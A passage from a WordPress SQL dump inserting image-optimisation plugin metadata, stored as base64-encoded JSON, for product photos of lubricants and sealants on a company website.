zdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mc2gtb2lsLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MTgsInRpbWUiOjE0ODM1Nzg2NTcsImlkIjo5OTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnNoLW9pbC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mc2gtb2lsLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZzaC1vaWwtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQ0OSwidGltZSI6MTQ4MzU3ODY2MCwiaWQiOjk5MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mc2gtb2lsLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZzaC1vaWwtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnNoLW9pbC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTIwLCJ0aW1lIjoxNDgzNTc4NjY0LCJpZCI6OTkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZzaC1vaWwtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnNoLW9pbC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mc2gtb2lsLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo1NjcsInRpbWUiOjE0ODM1Nzg2NjcsImlkIjo5OTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnNoLW9pbC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mc2gtb2lsLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZzaC1vaWwtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjcyMywidGltZSI6MTQ4MzU3ODY3MSwiaWQiOjk5MX1d'); 
INSERT INTO `wp_postmeta` VALUES (29848, 990, 'wpfc_optimisation_reduction', '3033624'); 
INSERT INTO `wp_postmeta` VALUES (29849, 990, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQuanBnIiwid2lkdGgiOjM1MDQsImhlaWdodCI6MjMzNiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQuanBnIiwicmVkdWN0aW9uIjozMDMzNjEwLCJ0aW1lIjoxNDgzNTc4NjgzLCJpZCI6Ijk5MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4Njg2LCJpZCI6OTkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODY4OSwiaWQiOjk5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzg2OTIsImlkIjo5OTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzg2OTYsImlkIjo5OTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4Njk5LCJpZCI6OTkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODcwMSwiaWQiOjk5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzg3MDQsImlkIjo5OTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4NzA3LCJpZCI6OTkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4NzA5LCJpZCI6OTkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4NzExLCJpZCI6OTkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4NzE0LCJpZCI6OTkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4NzE2LCJpZCI6OTkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4NzE5LCJpZCI6OTkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC10czQtdGhyZWFkLXNlYWxhbnQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4NzIyLCJpZCI6OTkwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29850, 985, 'wpfc_optimisation_reduction', '11387'); 
INSERT INTO `wp_postmeta` VALUES (29851, 985, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS5qcGciLCJ3aWR0aCI6NDcyNiwiaGVpZ2h0IjoyOTg0LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTc4NzI2LCJpZCI6Ijk4NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1ODcsInRpbWUiOjE0ODM1Nzg3MzAsImlkIjo5ODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtODAweDUwNS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUwNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS04MDB4NTA1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTgwMHg1MDUuanBnIiwicmVkdWN0aW9uIjoxMDEzLCJ0aW1lIjoxNDgzNTc4NzM0LCJpZCI6OTg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTc2OHg0ODUuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0ODUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtNzY4eDQ4NS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS03Njh4NDg1LmpwZyIsInJlZHVjdGlvbiI6ODk0LCJ0aW1lIjoxNDgzNTc4NzM4LCJpZCI6OTg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTE2MDB4MTAxMC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDEwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTE2MDB4MTAxMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xNjAweDEwMTAuanBnIiwicmVkdWN0aW9uIjoyODk3LCJ0aW1lIjoxNDgzNTc4NzQzLCJpZCI6OTg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTQ4LCJ0aW1lIjoxNDgzNTc4NzQ2LCJpZCI6OTg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDYyLCJ0aW1l